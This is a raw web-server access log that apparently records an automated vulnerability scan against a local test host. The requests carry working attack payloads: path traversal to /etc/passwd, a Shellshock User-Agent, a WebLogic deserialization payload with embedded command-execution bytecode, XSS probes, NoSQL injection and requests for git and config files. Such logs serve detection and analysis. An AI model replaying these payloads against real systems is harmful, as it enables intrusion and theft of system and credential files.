/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /runningpods/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static?/%2557EB-INF/web.xml HTTP/1.1","status":"301","body_bytes_sents":"169","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sensorlist.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /forum/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw/mindex.do?url=./WEB-INF/web.xml%3f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"methodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /./RestAPI/Connection HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?file=http://0177.0.0.1/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/94 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"xxxxorg.slf4j.ext.EventData<java><void class=\x22sun.misc.BASE64Decoder\x22><void method=\x22decodeBuffer\x22 id=\x22byte_arr\x22><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class=\x22org.mozilla.classfile.DefiningClassLoader\x22><void method=\x22defineClass\x22><string>ResultBaseExec</string><object idref=\x22byte_arr\x22></object><void method=\x22newInstance\x22><void method=\x22do_exec\x22 id=\x22result\x22><string>echo${IFS}COP-9272-9102-EVC|rev</string></void></void></void></void><void class=\x22java.lang.Thread\x22 method=\x22currentThread\x22><void method=\x22getCurrentWork\x22 id=\x22current_work\x22><void method=\x22getClass\x22><void method=\x22getDeclaredField\x22><string>connectionHandler</string><void method=\x22setAccessible\x22><boolean>true</boolean></void><void method=\x22get\x22><object idref=\x22current_work\x22></object><void method=\x22getServletRequest\x22><void method=\x22getResponse\x22><void method=\x22getServletOutputStream\x22><void method=\x22writeStream\x22><object class=\x22weblogic.xml.util.StringInputStream\x22><object idref=\x22result\x22></object></object></void><void method=\x22flush\x22/></void><void method=\x22getWriter\x22><void method=\x22write\x22><string></string></void></void></void></void></void></void></void></void></void></java>","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wls-wsat/CoordinatorPortType HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.svn/entries HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"vfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin.php?page=vfb-export HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1/wp-admin/admin.php?page=vfb-export", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"{\x0D\x0A \x22auth\x22: {\x0D\x0A \x22user\x22: {\x0D\x0A \x22$eq\x22: \x22admin\x22\x0D\x0A },\x0D\x0A \x22password\x22: [\x0D\x0A 0\x0D\x0A ]\x0D\x0A }\x0D\x0A}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /concat?/%2557EB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/config.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /help/admin-guide/test.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/95 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/slogin/login.py HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"() { :; }; echo ; echo ; /bin/cat /etc/passwd", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.servlet.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/hana/xs/formLogin/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /start.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"requester=login&request=login¶ms=%5B%7B%22name%22%3A%22input_id%22%2C%22value%22%3A%22kevinlab%22%7D%2C%7B%22name%22%3A%22input_passwd%22%2C%22value%22%3A%22kevin003%22%7D%2C%7B%22name%22%3A%22device_key%22%2C%22value%22%3A%22a2fe6b53-e09d-46df-8c9a-e666430e163e%22%7D%2C%7B%22name%22%3A%22auto_login%22%2C%22value%22%3Afalse%7D%2C%7B%22name%22%3A%22login_key%22%2C%22value%22%3A%22%22%7D%5D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /http/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ContactAdministrators!default.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/?uid=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", 